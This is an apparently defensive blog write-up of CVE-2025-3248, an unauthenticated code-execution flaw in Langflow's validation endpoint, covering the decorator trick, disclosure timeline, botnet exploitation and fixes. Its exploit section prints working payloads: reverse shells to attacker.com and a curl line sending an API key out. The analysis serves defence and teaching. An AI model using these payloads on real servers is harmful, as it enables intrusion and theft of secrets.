# Langflow RCE: The exec() That Ran Before Authentication
An AI workflow builder used exec() to validate code — before checking if the user was logged in. Attackers noticed. A deep dive into CVE-2025-3248, the botnet that followed, and what it means for anyone building with AI tools.
## The endpoint that executed first and asked questions later
Langflow had a code validation endpoint. The idea was simple: users building AI workflows could submit Python code, and the server would check whether it was valid before running it in a pipeline. Standard developer experience stuff.
Here's the problem. The endpoint used exec() to "validate" that code. And it did so before checking whether the request came from an authenticated user.
Read that again. The server would execute arbitrary Python code from an unauthenticated HTTP request, and only afterward attempt to verify the caller's identity. By the time the auth check ran, the damage was already done.
The result was CVE-2025-3248 — a CVSS 9.8 critical vulnerability that let anyone on the internet run arbitrary code on any Langflow server with a single POST request. No credentials. No tokens. No tricks. Just a curl command and a Python one-liner.
## What is Langflow, and why does this matter?
Langflow is an open-source platform for building AI agents and workflows. Think of it as a visual drag-and-drop builder for LLM pipelines — connect an API to a prompt template, wire it to a vector database, add a chatbot interface. It had over 40,000 GitHub stars and a growing base of developers and enterprises using it to build RAG applications, customer-facing chatbots, and internal AI tools.
The platform is powerful precisely because it lets users run custom Python code as part of their workflows. That power is also what made this vulnerability so dangerous.
Langflow instances are high-value targets. They typically hold API keys for services like OpenAI and Anthropic, have access to training data and internal documents, sit inside corporate networks, and run on GPU-enabled compute that's expensive and useful for cryptomining. One compromised Langflow instance gives an attacker a foothold into all of it.
## How the vulnerability worked
The vulnerable endpoint was /api/v1/validate/code. Its job was to check whether user-submitted Python code was syntactically valid. Here's a simplified version of the code path:
```python
@router.post("/api/v1/validate/code")
async def validate_code(request: CodeValidationRequest):
    code = request.code
    # Step 1: Parse and execute the code
    ast_tree = ast.parse(code)
    compiled = compile(ast_tree, '<string>', 'exec')
    exec(compiled)  # Runs attacker's code RIGHT HERE
    # Step 2: Check authentication (too late)
    if not is_authenticated(request):
        raise HTTPException(401, "Not authenticated")
```
The ordering is the entire vulnerability. exec() runs on line 7. The auth check happens on line 10. By the time the server realizes the caller isn't logged in, their code has already executed with the full privileges of the Langflow process.
This isn't a subtle logic error buried deep in a complex system. It's the wrong order of operations on a public-facing endpoint. The fix was straightforward: move the auth check above the exec() call. But for every version of Langflow before 1.3.0, the door was wide open.
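The corrected ordering can be sketched framework-free. This is an illustration of the shape of the fix, not Langflow's actual patch: `AuthError` and the dict-based request object are stand-ins, and `ast.parse()` shows that a syntax check never needed execution in the first place.

```python
import ast

class AuthError(Exception):
    """Stand-in for the framework's 401 response."""

def validate_code(request):
    # Step 1: authenticate BEFORE touching the submitted code.
    if not request.get("authenticated"):
        raise AuthError("401: not authenticated")

    # Step 2: a syntax check does not require execution.
    # ast.parse() validates structure without running decorators,
    # default arguments, or anything else in the submitted code.
    try:
        ast.parse(request["code"])
    except SyntaxError as err:
        return {"valid": False, "error": str(err)}
    return {"valid": True}
```

With this ordering, an unauthenticated caller is rejected before the server ever looks at the submitted code.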
## The decorator trick: Python's definition-time execution
Here's where it gets interesting for the Python community.
You might think exec() only runs top-level statements in the submitted code, and that defining a function is safe because the function itself never gets called. But a decorator expression is evaluated the moment the `def` statement executes, not when the function is later called. Since exec() executes every `def` statement it's given, the decorator runs immediately.
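You can see this with a harmless stand-in for the attacker's payload: the decorator expression runs even though the decorated function is never invoked (all names here are illustrative).

```python
calls = []

def log_decorator(tag):
    # This runs the moment the decorated `def` statement executes,
    # standing in for os.system(...) in a real payload.
    calls.append(tag)
    return lambda f: f  # identity decorator

@log_decorator("decorator expression evaluated")
def never_called():
    pass

# never_called() was never invoked, yet the side effect already happened.
assert calls == ["decorator expression evaluated"]
```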
Attackers used this to smuggle execution into what looks like an innocent function definition:
```python
@exec(__import__('os').system('id'))
def innocent_function():
    pass
```
When exec() processes this code, here's what happens:
- Python encounters the function definition with a decorator
- It evaluates the decorator expression: `__import__('os').system('id')`
- `os.system('id')` runs; the attacker's command executes
- The function object is never even created
- The attacker has code execution
The function body is irrelevant. The decorator is the payload. And because __import__ is a built-in, there's no need to have os or subprocess already imported. Everything the attacker needs is available in a default Python environment.
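A quick way to confirm that last point: even when exec() is handed a fresh, empty namespace, Python injects `__builtins__` into it, so `__import__` is always reachable from the submitted code.

```python
# An "empty" globals dict is no protection: exec() adds __builtins__
# automatically, which is all a payload needs to import os.
namespace = {}
exec("mod = __import__('os'); kind = mod.name", namespace)
assert namespace["kind"] in ("posix", "nt")
```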
## Exploit variations
The decorator trick enabled a range of attacks, from reconnaissance to full server takeover:
```python
# Reconnaissance
@exec(__import__('os').system('whoami'))
def x(): pass

# Reverse shell
@exec(__import__('os').system(
    'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
))
def x(): pass

# Steal API keys from environment variables
@exec(__import__('os').system(
    'curl http://attacker.com/?k='
    + __import__('os').environ.get('OPENAI_API_KEY', '')
))
def x(): pass

# Python-native reverse shell (no bash needed)
@exec(
    "import socket,subprocess;"
    "s=socket.socket();"
    "s.connect(('attacker.com',4444));"
    "subprocess.call(['/bin/sh','-i'],"
    "stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())"
)
def x(): pass
```
Every one of these payloads fits in a single HTTP request body. No authentication required. No multi-step exploit chain. Just POST to /api/v1/validate/code with the payload as the code field.
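To make "a single HTTP request" concrete, here is a standard-library sketch of the request shape. The hostname is a placeholder, port 7860 (Langflow's default) and the `code` JSON field are taken from the article's description and public write-ups, and the request is constructed but deliberately never sent.

```python
import json
import urllib.request

# Payload: the decorator trick from above, as the `code` field of a JSON body.
payload = {"code": "@exec(__import__('os').system('id'))\ndef x(): pass"}

req = urllib.request.Request(
    "http://vulnerable-host.example:7860/api/v1/validate/code",
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)
# urllib.request.urlopen(req)  # one request, no credentials -- not sent here
```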
## Two years of silence
This is the part that stings.
On July 27, 2023, a GitHub user named @Lyutoon opened Issue #696 on the Langflow repository. The report was clear and specific:
"The code validation endpoint can be exploited for RCE through a function definition's default parameter. This allows unauthenticated remote code execution."
The issue sat open. No fix. No triage. No security advisory. For nearly two years.
Here's the full timeline:
| Date | Event |
|---|---|
| July 27, 2023 | @Lyutoon reports the vulnerability in GitHub Issue #696 |
| 2023-2024 | Issue remains open, vulnerability unpatched |
| March 31, 2025 | Langflow 1.3.0 released with fix |
| April 3, 2025 | VulnCheck assigns CVE-2025-3248 |
| May 5, 2025 | CISA adds it to the Known Exploited Vulnerabilities catalog |
| May-June 2025 | Active exploitation campaigns documented in the wild |
Twenty months between "someone told you about this" and "you fixed it." In that window, every Langflow instance on the internet was running an unauthenticated remote code execution endpoint. Anyone who read the GitHub issue had a working exploit.
This is a pattern worth paying attention to. Open-source projects — especially fast-growing ones in the AI space — often prioritize features over security. The maintainers weren't malicious. They were building a product that people loved. But a critical security report collecting dust in a GitHub issue tracker for two years is a systemic failure, not just an oversight.
## The Flodrix botnet
The vulnerability didn't stay theoretical. Attackers automated exploitation at scale.
Trend Micro documented an active campaign using CVE-2025-3248 to deploy the Flodrix botnet. The attack chain was straightforward:
- Scan the internet for exposed Langflow instances (Shodan, Censys, or custom scanners)
- Send the decorator payload to `/api/v1/validate/code`
- Install the Flodrix botnet agent on the compromised server
- Harvest API keys from environment variables
- Use the compromised server for DDoS attacks, cryptomining, and lateral movement into internal networks
The campaign targeted servers in the US, Australia, Singapore, Germany, and Mexico. GreyNoise observed 361+ malicious IPs scanning for vulnerable Langflow instances.
On May 5, 2025, CISA added CVE-2025-3248 to the Known Exploited Vulnerabilities (KEV) catalog — the list of vulnerabilities that federal agencies are mandated to patch on a deadline. When CISA puts something in the KEV, it means one thing: this is being exploited right now, at scale, against real targets.
## A second vulnerability made it worse
As if one critical RCE wasn't enough, researchers at Obsidian Security found a second critical vulnerability in Langflow: CVE-2025-34291 (CVSS 9.4). This one enabled account takeover and remote code execution simply by having a logged-in Langflow user visit a malicious webpage.
| | CVE-2025-3248 | CVE-2025-34291 |
|---|---|---|
| Type | Unauthenticated RCE | Account takeover + RCE |
| CVSS | 9.8 | 9.4 |
| Attack | Direct POST request | User visits malicious page |
| User interaction | None | One click |
Two critical-severity vulnerabilities in the same AI platform, both enabling full server compromise. The first required no interaction at all. The second required a user to click a link.
## The AI tools problem
Langflow's vulnerability isn't an isolated incident. It's a symptom of a broader pattern: AI tools have fundamentally different attack surfaces than traditional web applications.
Traditional web apps handle data — text, images, user records. AI platforms handle code. They evaluate expressions, execute pipelines, run arbitrary logic. The features that make them powerful — dynamic code execution, plugin systems, tool use — are the same features that create dangerous entry points.
This shows up across the AI tooling ecosystem:
- Langflow: `exec()` on an unauthenticated endpoint
- AI-generated code: String concatenation instead of parameterized queries
- Vibe-coded apps broadly: Missing auth, disabled access controls, exposed secrets
The OWASP Top 10 maps directly to what happened here. CVE-2025-3248 is simultaneously A03 (Injection), A07 (Authentication Failures), and A04 (Insecure Design). Using exec() on user input is a design problem. Doing it before auth is an implementation problem. Together, they're catastrophic.
For builders using AI platforms and AI-generated code: the tools you rely on may have vulnerabilities you can't see from the outside. Langflow looked like a polished, well-maintained project with 40,000 GitHub stars. The RCE was invisible until someone checked.
## What you should do right now
Whether you're running Langflow, building on another AI platform, or shipping code that AI helped you write, here's what matters:
- **If you run Langflow, upgrade immediately.** Version 1.3.0 and later have the fix. If you can't upgrade right now, block external access to the instance with firewall rules. Check your logs for requests to `/api/v1/validate/code` from unexpected sources, and rotate every API key stored in that environment.

  ```shell
  pip install "langflow>=1.3.0"
  ```

- **Audit your AI tools the way you'd audit your own code.** What endpoints does your AI platform expose? Do they all require authentication? Can you hit them from outside your network? These aren't hypothetical questions; they're the difference between CVE-2025-3248 affecting you or not.

- **Never trust that "validation" means "safe."** Langflow's endpoint was called "validate", but it used `exec()`. The name of a function doesn't determine what it does. If you're building features that touch user-submitted code, use static analysis (AST inspection without execution), sandboxed environments, or both. Never `exec()` or `eval()` untrusted input.

- **Check authentication ordering in your own code.** This vulnerability existed because auth happened after processing. Review your middleware stack. Does every dangerous operation check credentials first? In frameworks like FastAPI and Express, it's easy to accidentally process a request body before auth middleware runs.
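The "AST inspection without execution" approach can be sketched as a pre-filter. This is a heuristic for illustration only, not Langflow's actual patch, and a real deployment would need a proper sandbox on top of it; `is_suspicious` and its rules are this article's invention.

```python
import ast

def is_suspicious(source: str) -> bool:
    """Parse-only screening of submitted code; nothing is executed."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return True  # reject unparseable input outright
    for node in ast.walk(tree):
        # Decorators and default arguments execute when the `def` runs
        # under exec(), so any decorated function is a red flag here.
        if isinstance(node, ast.FunctionDef) and node.decorator_list:
            return True
        # Flag direct calls to the usual dynamic-execution built-ins.
        if isinstance(node, ast.Call):
            name = getattr(node.func, "id", "")
            if name in {"exec", "eval", "__import__", "compile"}:
                return True
    return False
```

The decorator payload from earlier trips both rules, while an ordinary function definition passes; the point is that `ast.parse()` gives you this visibility without ever running the code.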
## The ordering matters
CVE-2025-3248 is, at its core, a story about ordering. Execute first, authenticate later. That's it. No exotic memory corruption. No complex exploit chain. Just two operations in the wrong sequence, exposed to the internet for two years while a GitHub issue sat unanswered.
The Langflow team fixed it. CISA flagged it. But the Flodrix botnet had already moved in. API keys had already been harvested. Servers had already been conscripted into DDoS networks.
The lesson isn't that Langflow is bad software. It's that AI tools carry AI-sized risks, and the security basics — authenticate before you process, never exec untrusted input, respond to vulnerability reports — haven't changed just because the tools got smarter.
Build with AI tools. Ship fast. But check the locks before you leave the door open.
CVE-2025-3248 is documented in public research by Horizon3.ai, Trend Micro, and Zscaler ThreatLabz, and in the CISA KEV catalog.